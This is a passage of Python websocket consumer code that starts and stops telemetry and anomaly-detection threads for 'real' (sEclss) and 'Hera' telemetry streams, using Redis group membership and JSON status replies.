args=(global_obj.sEclss_to_hub_queue,
global_obj.hub_to_sEclss_queue,
global_obj.server_to_sEclss_queue))
global_obj.sEclss_thread.start()
# Check that the telemetry thread has started, then send success
if global_obj.sEclss_thread.is_alive():
print("Real telemetry started.")
global_obj.frontend_to_hub_queue.put({"type": "add_to_sEclss_group",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
self.send(json.dumps({
'type': 'real_telemetry_response',
'content': {
'status': 'success',
'message': 'Success starting real telemetry and real AT thread.',
'attempt': content.get('attempt')
}
}))
frontend_to_hub_queue.put({'type': 'get_real_telemetry_params',
'channel_layer': self.channel_layer,
'channel_name': self.channel_name})
# If not working then stop at thread and send back error
else:
global_obj.hub_to_sEclss_at_queue.put({'type': 'stop'})
self.send(json.dumps({
'type': 'real_telemetry_response',
'content': {
'status': 'error',
'message': 'Success starting Real AT Thread but failure to start real'
'telemetry thread. Real AT Thread stopped. Try again.',
'attempt': content.get('attempt')
}
}))
# If sEclss thread has been initialized then handle if it alive or not
else:
# If it is alive then join it
if global_obj.sEclss_thread.is_alive():
global_obj.frontend_to_hub_queue.put({"type": "add_to_sEclss_group",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
self.send(json.dumps({
'type': 'real_telemetry_response',
'content': {
'status': 'already_running',
'message': 'Success starting real at thread and real telemetry was'
' already running.',
'attempt': content.get('attempt')
}
}))
frontend_to_hub_queue.put({'type': 'get_real_telemetry_params',
'channel_layer': self.channel_layer,
'channel_name': self.channel_name})
# If it is not alive then reinitialize it
else:
# Simulator thread initialization
global_obj.sEclss_thread = threading.Thread(target=handle_eclss_update,
name="Real Telemetry Thread",
args=(global_obj.sEclss_to_hub_queue,
global_obj.hub_to_sEclss_queue,
global_obj.server_to_sEclss_queue))
global_obj.sEclss_thread.start()
# Check that the telemetry thread has started, then send success
if global_obj.sEclss_thread.is_alive():
print("Real telemetry started.")
global_obj.frontend_to_hub_queue.put({"type": "add_to_sEclss_group",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
self.send(json.dumps({
'type': 'real_telemetry_response',
'content': {
'status': 'success',
'message': 'Success starting real telemetry and real AT thread.',
'attempt': content.get('attempt')
}
}))
frontend_to_hub_queue.put({'type': 'get_real_telemetry_params',
'channel_layer': self.channel_layer,
'channel_name': self.channel_name})
# If not working then stop at thread and send back error
else:
global_obj.hub_to_sEclss_at_queue.put({'type': 'stop'})
self.send(json.dumps({
'type': 'real_telemetry_response',
'content': {
'status': 'error',
'message': 'Success starting Real AT Thread but failure to start real'
'telemetry thread. Real AT Thread stopped. Try again.',
'attempt': content.get('attempt')
}
}))
# If sEclss at thread does not start then don't start real telemetry and send back error
else:
self.send(json.dumps({
'type': 'real_telemetry_response',
'content': {
'status': 'error',
'message': 'Error starting real at thread. Real telemetry was not started.',
'attempt': content.get('attempt')
}
}))
# If sEclss at thread has been initialized then handle if it is alive or not
else:
# If alive then check telemetry as normal
if global_obj.sEclss_at_thread.is_alive():
# Check if sEclss thread has not been initialized, then initialize it
if global_obj.sEclss_thread is None:
# Simulator thread initialization
global_obj.sEclss_thread = threading.Thread(target=handle_eclss_update,
name="Real Telemetry Thread",
args=(global_obj.sEclss_to_hub_queue,
global_obj.hub_to_sEclss_queue,
global_obj.server_to_sEclss_queue))
global_obj.sEclss_thread.start()
# Check that the telemetry thread has started, then send success
if global_obj.sEclss_thread.is_alive():
print("Real telemetry started.")
global_obj.frontend_to_hub_queue.put({"type": "add_to_sEclss_group",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
self.send(json.dumps({
'type': 'real_telemetry_response',
'content': {
'status': 'success',
'message': 'Success starting real telemetry and real AT thread was already'
' running.',
'attempt': content.get('attempt')
}
}))
frontend_to_hub_queue.put({'type': 'get_real_telemetry_params',
'channel_layer': self.channel_layer,
'channel_name': self.channel_name})
# If not working then stop at thread and send back error
else:
global_obj.hub_to_sEclss_at_queue.put({'type': 'stop'})
self.send(json.dumps({
'type': 'real_telemetry_response',
'content': {
'status': 'error',
'message': 'Real at thread was already running but failure to start real'
'telemetry thread. Real AT Thread stopped. Try again.',
'attempt': content.get('attempt')
}
}))
# If sEclss thread has been initialized then handle if it alive or not
else:
# If it is alive then join it
if global_obj.sEclss_thread.is_alive():
global_obj.frontend_to_hub_queue.put({"type": "add_to_sEclss_group",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
self.send(json.dumps({
'type': 'real_telemetry_response',
'content': {
'status': 'already_running',
'message': 'Real at thread and real telemetry was'
' already running.',
'attempt': content.get('attempt')
}
}))
frontend_to_hub_queue.put({'type': 'get_real_telemetry_params',
'channel_layer': self.channel_layer,
'channel_name': self.channel_name})
# If it is not alive then reinitialize it
else:
# Simulator thread initialization
global_obj.sEclss_thread = threading.Thread(target=handle_eclss_update,
name="Real Telemetry Thread",
args=(global_obj.sEclss_to_hub_queue,
global_obj.hub_to_sEclss_queue,
global_obj.server_to_sEclss_queue))
global_obj.sEclss_thread.start()
# Check that the telemetry thread has started, then send success
if global_obj.sEclss_thread.is_alive():
print("Real telemetry started.")
global_obj.frontend_to_hub_queue.put({"type": "add_to_sEclss_group",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
self.send(json.dumps({
'type': 'real_telemetry_response',
'content': {
'status': 'success',
'message': 'Success starting real telemetry and real AT thread was '
'already running.',
'attempt': content.get('attempt')
}
}))
frontend_to_hub_queue.put({'type': 'get_real_telemetry_params',
'channel_layer': self.channel_layer,
'channel_name': self.channel_name})
# If not working then stop at thread and send back error
else:
global_obj.hub_to_sEclss_at_queue.put({'type': 'stop'})
self.send(json.dumps({
'type': 'real_telemetry_response',
'content': {
'status': 'error',
'message': 'Real AT Thread was already running but failure to start real'
'telemetry thread. Real AT Thread stopped. Try again.',
'attempt': content.get('attempt')
}
}))
# If not alive then reinitialize it and handle telemetry normally
else:
# Anomaly detection thread initialization for real telemetry
global_obj.sEclss_at_thread = threading.Thread(target=anomaly_treatment_routine,
name="Real AT Thread",
args=(global_obj.hub_to_sEclss_at_queue,
global_obj.sEclss_at_to_hub_queue,))
global_obj.sEclss_at_thread.start()
# Check that the anomaly detection thread is working then check sEclss thread
if global_obj.sEclss_at_thread.is_alive():
print("Real AT Thread started.")
# Check if sEclss thread has not been initialized, then initialize it
if global_obj.sEclss_thread is None:
# Simulator thread initialization
global_obj.sEclss_thread = threading.Thread(target=handle_eclss_update,
name="Real Telemetry Thread",
args=(global_obj.sEclss_to_hub_queue,
global_obj.hub_to_sEclss_queue,
global_obj.server_to_sEclss_queue))
global_obj.sEclss_thread.start()
# Check that the telemetry thread has started, then send success
if global_obj.sEclss_thread.is_alive():
print("Real telemetry started.")
global_obj.frontend_to_hub_queue.put({"type": "add_to_sEclss_group",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
self.send(json.dumps({
'type': 'real_telemetry_response',
'content': {
'status': 'success',
'message': 'Success starting real telemetry and real AT thread.',
'attempt': content.get('attempt')
}
}))
frontend_to_hub_queue.put({'type': 'get_real_telemetry_params',
'channel_layer': self.channel_layer,
'channel_name': self.channel_name})
# If not working then stop at thread and send back error
else:
global_obj.hub_to_sEclss_at_queue.put({'type': 'stop'})
self.send(json.dumps({
'type': 'real_telemetry_response',
'content': {
'status': 'error',
'message': 'Success starting Real AT Thread but failure to start real'
'telemetry thread. Real AT Thread stopped. Try again.',
'attempt': content.get('attempt')
}
}))
# If sEclss thread has been initialized then handle if it alive or not
else:
# If it is alive then join it
if global_obj.sEclss_thread.is_alive():
global_obj.frontend_to_hub_queue.put({"type": "add_to_sEclss_group",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
self.send(json.dumps({
'type': 'real_telemetry_response',
'content': {
'status': 'already_running',
'message': 'Success starting real at thread and real telemetry was'
' already running.',
'attempt': content.get('attempt')
}
}))
frontend_to_hub_queue.put({'type': 'get_real_telemetry_params',
'channel_layer': self.channel_layer,
'channel_name': self.channel_name})
# If it is not alive then reinitialize it
else:
# Simulator thread initialization
global_obj.sEclss_thread = threading.Thread(target=handle_eclss_update,
name="Real Telemetry Thread",
args=(global_obj.sEclss_to_hub_queue,
global_obj.hub_to_sEclss_queue,
global_obj.server_to_sEclss_queue))
global_obj.sEclss_thread.start()
# Check that the telemetry thread has started, then send success
if global_obj.sEclss_thread.is_alive():
print("Real telemetry started.")
global_obj.frontend_to_hub_queue.put({"type": "add_to_sEclss_group",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
self.send(json.dumps({
'type': 'real_telemetry_response',
'content': {
'status': 'success',
'message': 'Success starting real telemetry and real AT thread.',
'attempt': content.get('attempt')
}
}))
frontend_to_hub_queue.put({'type': 'get_real_telemetry_params',
'channel_layer': self.channel_layer,
'channel_name': self.channel_name})
# If not working then stop at thread and send back error
else:
global_obj.hub_to_sEclss_at_queue.put({'type': 'stop'})
self.send(json.dumps({
'type': 'real_telemetry_response',
'content': {
'status': 'error',
'message': 'Success starting Real AT Thread but failure to start real'
'telemetry thread. Real AT Thread stopped. Try again.',
'attempt': content.get('attempt')
}
}))
# If sEclss at thread does not start then don't start real telemetry and send back error
else:
self.send(json.dumps({
'type': 'real_telemetry_response',
'content': {
'status': 'error',
'message': 'Error starting real at thread. Real telemetry was not started.',
'attempt': content.get('attempt')
}
}))
elif content.get('type') == 'start_hera_telemetry':
# Check if sEclss at thread is not initialized then initialize it and handle sEclss thread
if global_obj.hera_at_thread is None:
# Anomaly detection thread initialization for real telemetry
global_obj.hera_at_thread = threading.Thread(target=anomaly_treatment_routine,
name="Hera AT Thread",
args=(global_obj.hub_to_hera_at_queue,
global_obj.hera_at_to_hub_queue,))
global_obj.hera_at_thread.start()
# Check that the anomaly detection thread is working then check sEclss thread
if global_obj.hera_at_thread.is_alive():
print("Hera AT Thread started.")
# Check if sEclss thread has not been initialized, then initialize it
if global_obj.hera_thread is None:
# Simulator thread initialization
global_obj.hera_thread = threading.Thread(target=handle_eclss_update,
name="Hera Telemetry Thread",
args=(global_obj.hera_to_hub_queue,
global_obj.hub_to_hera_queue,
global_obj.server_to_hera_queue))
global_obj.hera_thread.start()
# Check that the telemetry thread has started, then send success
if global_obj.hera_thread.is_alive():
print("Hera telemetry started.")
global_obj.frontend_to_hub_queue.put({"type": "add_to_hera_group",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
self.send(json.dumps({
'type': 'hera_telemetry_response',
'content': {
'status': 'success',
'message': 'Success starting hera telemetry and hera AT thread.',
'attempt': content.get('attempt')
}
}))
frontend_to_hub_queue.put({'type': 'get_hera_telemetry_params',
'channel_layer': self.channel_layer,
'channel_name': self.channel_name})
# If not working then stop at thread and send back error
else:
global_obj.hub_to_hera_at_queue.put({'type': 'stop'})
self.send(json.dumps({
'type': 'hera_telemetry_response',
'content': {
'status': 'error',
'message': 'Success starting Hera AT Thread but failure to start hera'
'telemetry thread. Real AT Thread stopped. Try again.',
'attempt': content.get('attempt')
}
}))
# If sEclss thread has been initialized then handle if it alive or not
else:
# If it is alive then join it
if global_obj.hera_thread.is_alive():
global_obj.frontend_to_hub_queue.put({"type": "add_to_hera_group",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
self.send(json.dumps({
'type': 'hera_telemetry_response',
'content': {
'status': 'already_running',
'message': 'Success starting hera at thread and real telemetry was'
' already running.',
'attempt': content.get('attempt')
}
}))
frontend_to_hub_queue.put({'type': 'get_hera_telemetry_params',
'channel_layer': self.channel_layer,
'channel_name': self.channel_name})
# If it is not alive then reinitialize it
else:
# Simulator thread initialization
global_obj.hera_thread = threading.Thread(target=handle_eclss_update,
name="Hera Telemetry Thread",
args=(global_obj.hera_to_hub_queue,
global_obj.hub_to_hera_queue,
global_obj.server_to_hera_queue))
global_obj.hera_thread.start()
# Check that the telemetry thread has started, then send success
if global_obj.hera_thread.is_alive():
print("Hera telemetry started.")
global_obj.frontend_to_hub_queue.put({"type": "add_to_hera_group",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
self.send(json.dumps({
'type': 'hera_telemetry_response',
'content': {
'status': 'success',
'message': 'Success starting hera telemetry and hera AT thread.',
'attempt': content.get('attempt')
}
}))
frontend_to_hub_queue.put({'type': 'get_hera_telemetry_params',
'channel_layer': self.channel_layer,
'channel_name': self.channel_name})
# If not working then stop at thread and send back error
else:
global_obj.hub_to_hera_at_queue.put({'type': 'stop'})
self.send(json.dumps({
'type': 'hera_telemetry_response',
'content': {
'status': 'error',
'message': 'Success starting Hera AT Thread but failure to start hera'
'telemetry thread. Real AT Thread stopped. Try again.',
'attempt': content.get('attempt')
}
}))
# If sEclss at thread does not start then don't start real telemetry and send back error
else:
self.send(json.dumps({
'type': 'hera_telemetry_response',
'content': {
'status': 'error',
'message': 'Error starting hera at thread. Hera telemetry was not started.',
'attempt': content.get('attempt')
}
}))
# If sEclss at thread has been initialized then handle if it is alive or not
else:
# If alive then check telemetry as normal
if global_obj.hera_at_thread.is_alive():
# Check if sEclss thread has not been initialized, then initialize it
if global_obj.hera_thread is None:
# Simulator thread initialization
global_obj.hera_thread = threading.Thread(target=handle_eclss_update,
name="Hera Telemetry Thread",
args=(global_obj.hera_to_hub_queue,
global_obj.hub_to_hera_queue,
global_obj.server_to_hera_queue))
global_obj.hera_thread.start()
# Check that the telemetry thread has started, then send success
if global_obj.hera_thread.is_alive():
print("Hera telemetry started.")
global_obj.frontend_to_hub_queue.put({"type": "add_to_hera_group",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
self.send(json.dumps({
'type': 'hera_telemetry_response',
'content': {
'status': 'success',
'message': 'Success starting hera telemetry and hera AT thread was already'
' running.',
'attempt': content.get('attempt')
}
}))
frontend_to_hub_queue.put({'type': 'get_hera_telemetry_params',
'channel_layer': self.channel_layer,
'channel_name': self.channel_name})
# If not working then stop at thread and send back error
else:
global_obj.hub_to_hera_at_queue.put({'type': 'stop'})
self.send(json.dumps({
'type': 'hera_telemetry_response',
'content': {
'status': 'error',
'message': 'Hera at thread was already running but failure to start hera'
'telemetry thread. Hera AT Thread stopped. Try again.',
'attempt': content.get('attempt')
}
}))
# If sEclss thread has been initialized then handle if it alive or not
else:
# If it is alive then join it
if global_obj.hera_thread.is_alive():
global_obj.frontend_to_hub_queue.put({"type": "add_to_hera_group",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
self.send(json.dumps({
'type': 'hera_telemetry_response',
'content': {
'status': 'already_running',
'message': 'Hera at thread and hera telemetry was'
' already running.',
'attempt': content.get('attempt')
}
}))
frontend_to_hub_queue.put({'type': 'get_hera_telemetry_params',
'channel_layer': self.channel_layer,
'channel_name': self.channel_name})
# If it is not alive then reinitialize it
else:
# Simulator thread initialization
global_obj.hera_thread = threading.Thread(target=handle_eclss_update,
name="Hera Telemetry Thread",
args=(global_obj.hera_to_hub_queue,
global_obj.hub_to_hera_queue,
global_obj.server_to_hera_queue))
global_obj.hera_thread.start()
# Check that the telemetry thread has started, then send success
if global_obj.hera_thread.is_alive():
print("Hera telemetry started.")
global_obj.frontend_to_hub_queue.put({"type": "add_to_hera_group",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
self.send(json.dumps({
'type': 'hera_telemetry_response',
'content': {
'status': 'success',
'message': 'Success starting hera telemetry and hera AT thread was '
'already running.',
'attempt': content.get('attempt')
}
}))
frontend_to_hub_queue.put({'type': 'get_hera_telemetry_params',
'channel_layer': self.channel_layer,
'channel_name': self.channel_name})
# If not working then stop at thread and send back error
else:
global_obj.hub_to_hera_at_queue.put({'type': 'stop'})
self.send(json.dumps({
'type': 'real_telemetry_response',
'content': {
'status': 'error',
'message': 'Hera AT Thread was already running but failure to start hera'
'telemetry thread. Hera AT Thread stopped. Try again.',
'attempt': content.get('attempt')
}
}))
# If not alive then reinitialize it and handle telemetry normally
else:
# Anomaly detection thread initialization for real telemetry
global_obj.hera_at_thread = threading.Thread(target=anomaly_treatment_routine,
name="Hera AT Thread",
args=(global_obj.hub_to_hera_at_queue,
global_obj.hera_at_to_hub_queue,))
global_obj.hera_at_thread.start()
# Check that the anomaly detection thread is working then check sEclss thread
if global_obj.hera_at_thread.is_alive():
print("Hera AT Thread started.")
# Check if sEclss thread has not been initialized, then initialize it
if global_obj.hera_thread is None:
# Simulator thread initialization
global_obj.hera_thread = threading.Thread(target=handle_eclss_update,
name="Hera Telemetry Thread",
args=(global_obj.hera_to_hub_queue,
global_obj.hub_to_hera_queue,
global_obj.server_to_hera_queue))
global_obj.hera_thread.start()
# Check that the telemetry thread has started, then send success
if global_obj.hera_thread.is_alive():
print("Hera telemetry started.")
global_obj.frontend_to_hub_queue.put({"type": "add_to_hera_group",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
self.send(json.dumps({
'type': 'hera_telemetry_response',
'content': {
'status': 'success',
'message': 'Success starting hera telemetry and hera AT thread.',
'attempt': content.get('attempt')
}
}))
frontend_to_hub_queue.put({'type': 'get_hera_telemetry_params',
'channel_layer': self.channel_layer,
'channel_name': self.channel_name})
# If not working then stop at thread and send back error
else:
global_obj.hub_to_sEclss_at_queue.put({'type': 'stop'})
self.send(json.dumps({
'type': 'hera_telemetry_response',
'content': {
'status': 'error',
'message': 'Success starting Hera AT Thread but failure to start hera'
'telemetry thread. hera AT Thread stopped. Try again.',
'attempt': content.get('attempt')
}
}))
# If sEclss thread has been initialized then handle if it alive or not
else:
# If it is alive then join it
if global_obj.hera_thread.is_alive():
global_obj.frontend_to_hub_queue.put({"type": "add_to_hera_group",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
self.send(json.dumps({
'type': 'hera_telemetry_response',
'content': {
'status': 'already_running',
'message': 'Success starting hera at thread and hera telemetry was'
' already running.',
'attempt': content.get('attempt')
}
}))
frontend_to_hub_queue.put({'type': 'get_hera_telemetry_params',
'channel_layer': self.channel_layer,
'channel_name': self.channel_name})
# If it is not alive then reinitialize it
else:
# Simulator thread initialization
global_obj.hera_thread = threading.Thread(target=handle_eclss_update,
name="Hera Telemetry Thread",
args=(global_obj.hera_to_hub_queue,
global_obj.hub_to_hera_queue,
global_obj.server_to_hera_queue))
global_obj.hera_thread.start()
# Check that the telemetry thread has started, then send success
if global_obj.hera_thread.is_alive():
print("Hera telemetry started.")
global_obj.frontend_to_hub_queue.put({"type": "add_to_hera_group",
"channel_layer": self.channel_layer,
"channel_name": self.channel_name})
self.send(json.dumps({
'type': 'hera_telemetry_response',
'content': {
'status': 'success',
'message': 'Success starting hera telemetry and hera AT thread.',
'attempt': content.get('attempt')
}
}))
frontend_to_hub_queue.put({'type': 'get_hera_telemetry_params',
'channel_layer': self.channel_layer,
'channel_name': self.channel_name})
# If not working then stop at thread and send back error
else:
global_obj.hub_to_hera_at_queue.put({'type': 'stop'})
self.send(json.dumps({
'type': 'real_telemetry_response',
'content': {
'status': 'error',
'message': 'Success starting Hera AT Thread but failure to start hera'
'telemetry thread. Hera AT Thread stopped. Try again.',
'attempt': content.get('attempt')
}
}))
# If sEclss at thread does not start then don't start real telemetry and send back error
else:
self.send(json.dumps({
'type': 'hera_telemetry_response',
'content': {
'status': 'error',
'message': 'Error starting hera at thread. Hera telemetry was not started.',
'attempt': content.get('attempt')
}
}))
elif content.get('type') == 'stop_telemetry':
# Find what telemetry this user is assigned to if any
if r.sismember('seclss-group-users', self.channel_name) == 1:
# Check if both telemetry and at thread are not initialized
if global_obj.sEclss_thread is None and global_obj.sEclss_at_thread is None:
r.srem('seclss-group-users', self.channel_name)
async_to_sync(self.channel_layer.group_discard)("sEclss-group", self.channel_name)
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'This user is assigned to real telemetry but real telemetry and real at threads'
' are not initialized.',
'attempt': content.get('attempt')
}
}))
# Check if only telemetry thread is not initialized
elif global_obj.sEclss_thread is None:
# Check if at thread is alive, then kill that thread
if global_obj.sEclss_at_thread.is_alive():
# Remove user from listening to the real telemetry
async_to_sync(self.channel_layer.group_discard)('seclss-group', self.channel_name)
r.srem("seclss-group-users", self.channel_name)
if r.scard("seclss-group-users") == 0:
global_obj.hub_to_sEclss_at_queue.put({'type': 'stop'})
# Ensure it gets stopped
successful = True
atMessage = ''
global_obj.sEclss_at_thread.join(2.0)
# If not successful send back error message
if global_obj.sEclss_at_thread.is_alive():
successful = False
atMessage = 'There was an error stopping real at thread.'
if successful:
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_real',
'channel_layer': self.channel_layer})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success stopping real at thread and real telemetry was not '
'initialized. Proceed',
'attempt': content.get('attempt')
}
}))
else:
async_to_sync(self.channel_layer.group_add)('seclss-group', self.channel_name)
r.sadd("seclss-group-users", self.channel_name)
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'error',
'message': atMessage + ' Real telemetry thread was never initialized.',
'attempt': content.get('attempt')
}
}))
else:
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_real',
'channel_layer': self.channel_layer})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success removing user from seclss group users. Proceed',
'attempt': content.get('attempt')
}
}))
# If it is not alive then it is already stopped, send back success
else:
async_to_sync(self.channel_layer.group_discard)('seclss-group', self.channel_name)
r.srem("seclss-group-users", self.channel_name)
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_real',
'channel_layer': self.channel_layer})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Real telemetry thread was not initialized and real at thread was '
'already killed. Proceed',
'attempt': content.get('attempt')
}
}))
# Check if only telemetry thread is not initialized
elif global_obj.sEclss_at_thread is None:
# Check if telemetry thread is alive, then kill that thread
if global_obj.sEclss_thread.is_alive():
# Remove user from listening to the real telemetry
async_to_sync(self.channel_layer.group_discard)('seclss-group', self.channel_name)
r.srem("seclss-group-users", self.channel_name)
if r.scard("seclss-group-users") == 0:
global_obj.hub_to_sEclss_queue.put({'type': 'stop'})
# Ensure it gets stopped
successful = True
telemetryMessage = ''
global_obj.sEclss_thread.join(2.0)
# If not successful send back error message
if global_obj.sEclss_thread.is_alive():
successful = False
telemetryMessage = 'There was an error stopping real telemetry thread.'
if successful:
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_real',
'channel_layer': self.channel_layer})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success stopping real telemetry thread and real at was not '
'initialized. Proceed',
'attempt': content.get('attempt')
}
}))
else:
async_to_sync(self.channel_layer.group_add)('seclss-group', self.channel_name)
r.sadd("seclss-group-users", self.channel_name)
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'error',
'message': telemetryMessage + ' Real at thread was never initialized.',
'attempt': content.get('attempt')
}
}))
else:
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_real',
'channel_layer': self.channel_layer})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success removing user from seclss group users. Proceed',
'attempt': content.get('attempt')
}
}))
# If it is not alive then it is already stopped, send back success
else:
async_to_sync(self.channel_layer.group_discard)('seclss-group', self.channel_name)
r.srem("seclss-group-users", self.channel_name)
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_real',
'channel_layer': self.channel_layer})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Real at thread was not initialized and real telemetry thread was '
'already killed. Proceed',
'attempt': content.get('attempt')
}
}))
# Check if both have been initialized
else:
# Check if both are alive then kill both
if global_obj.sEclss_thread.is_alive() and global_obj.sEclss_at_thread.is_alive():
# Remove user from listening to the real telemetry
async_to_sync(self.channel_layer.group_discard)('seclss-group', self.channel_name)
r.srem("seclss-group-users", self.channel_name)
# If no more users are listening to the real telemetry then stop it
if r.scard("seclss-group-users") == 0:
global_obj.frontend_to_hub_queue.put({'type': 'stop_real_telemetry'})
# Ensure that the thread stops
successful = True
sEclssMessage = ''
atsEclssMessage = ''
global_obj.sEclss_thread.join(2.0)
if global_obj.sEclss_thread.is_alive():
successful = False
sEclssMessage = 'There was an error stopping the real telemetry thread.'
global_obj.sEclss_at_thread.join(2.0)
if global_obj.sEclss_at_thread.is_alive():
successful = False
atsEclssMessage = 'There was an error stopping the real at thread.'
if successful:
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_real',
'channel_layer': self.channel_layer})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success stopping the real telemetry. Proceed',
'attempt': content.get('attempt')
}
}))
else:
async_to_sync(self.channel_layer.group_add)('seclss-group', self.channel_name)
r.sadd('seclss-group-users', self.channel_name)
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'error',
'message': sEclssMessage + ' ' + atsEclssMessage,
'attempt': content.get('attempt')
}
}))
else:
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_real',
'channel_layer': self.channel_layer})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success removing user from seclss group users. Proceed',
'attempt': content.get('attempt')
}
}))
# Check if only sEclss thread is alive
elif global_obj.sEclss_thread.is_alive():
# Remove user from listening to the real telemetry
async_to_sync(self.channel_layer.group_discard)('seclss-group', self.channel_name)
r.srem("seclss-group-users", self.channel_name)
if r.scard("seclss-group-users") == 0:
global_obj.hub_to_sEclss_queue.put({'type': 'stop'})
# Ensure it gets stopped
successful = True
telemetryMessage = ''
global_obj.sEclss_thread.join(2.0)
# If not successful send back error message
if global_obj.sEclss_thread.is_alive():
successful = False
telemetryMessage = 'There was an error stopping real telemetry thread.'
if successful:
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_real',
'channel_layer': self.channel_layer})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success stopping real telemetry thread and real at was not '
'alive. Proceed',
'attempt': content.get('attempt')
}
}))
else:
async_to_sync(self.channel_layer.group_add)('seclss-group', self.channel_name)
r.sadd("seclss-group-users", self.channel_name)
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'error',
'message': telemetryMessage + ' Real at thread was never alive.',
'attempt': content.get('attempt')
}
}))
else:
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_real',
'channel_layer': self.channel_layer})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success removing user from seclss group users. Proceed',
'attempt': content.get('attempt')
}
}))
# Check if only at thread is alive
elif global_obj.sEclss_at_thread.is_alive():
# Remove user from listening to the real telemetry
async_to_sync(self.channel_layer.group_discard)('seclss-group', self.channel_name)
r.srem("seclss-group-users", self.channel_name)
if r.scard("seclss-group-users") == 0:
global_obj.hub_to_sEclss_at_queue.put({'type': 'stop'})
# Ensure it gets stopped
successful = True
atMessage = ''
global_obj.sEclss_at_thread.join(2.0)
# If not successful send back error message
if global_obj.sEclss_at_thread.is_alive():
successful = False
atMessage = 'There was an error stopping real at thread.'
if successful:
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_real',
'channel_layer': self.channel_layer})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success stopping real at thread and real telemetry was not '
'alive. Proceed',
'attempt': content.get('attempt')
}
}))
else:
async_to_sync(self.channel_layer.group_add)('seclss-group', self.channel_name)
r.sadd("seclss-group-users", self.channel_name)
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'error',
'message': atMessage + ' Real telemetry thread was never alive.',
'attempt': content.get('attempt')
}
}))
else:
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_real',
'channel_layer': self.channel_layer})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success removing user from seclss group users. Proceed',
'attempt': content.get('attempt')
}
}))
# Check if both are not running
else:
async_to_sync(self.channel_layer.group_discard)('seclss-group', self.channel_name)
r.srem("seclss-group-users", self.channel_name)
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_real',
'channel_layer': self.channel_layer})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Real at thread was not alive and real telemetry thread was '
'already alive. Success removing using from seclss group users. Proceed',
'attempt': content.get('attempt')
}
}))
elif r.sismember('hera-group-users', self.channel_name) == 1:
# Check if both telemetry and at thread are not initialized
if global_obj.hera_thread is None and global_obj.hera_at_thread is None:
r.srem('hera-group-users', self.channel_name)
async_to_sync(self.channel_layer.group_discard)("hera-group", self.channel_name)
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'This user is assigned to hera telemetry but hera telemetry and hera at threads'
' are not initialized.',
'attempt': content.get('attempt')
}
}))
# Check if only telemetry thread is not initialized
elif global_obj.hera_thread is None:
# Check if at thread is alive, then kill that thread
if global_obj.hera_at_thread.is_alive():
# Remove user from listening to the real telemetry
async_to_sync(self.channel_layer.group_discard)('hera-group', self.channel_name)
r.srem("hera-group-users", self.channel_name)
if r.scard("hera-group-users") == 0:
global_obj.hub_to_hera_at_queue.put({'type': 'stop'})
# Ensure it gets stopped
successful = True
atMessage = ''
global_obj.hera_at_thread.join(2.0)
# If not successful send back error message
if global_obj.hera_at_thread.is_alive():
successful = False
atMessage = 'There was an error stopping hera at thread.'
if successful:
global_obj.frontend_to_hub_queue.put({'type': 'remove_channel_layer_from_hera',
'channel_layer': self.channel_layer})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success stopping hera at thread and hera telemetry was not '
'initialized. Proceed',
'attempt': content.get('attempt')
}
}))
else:
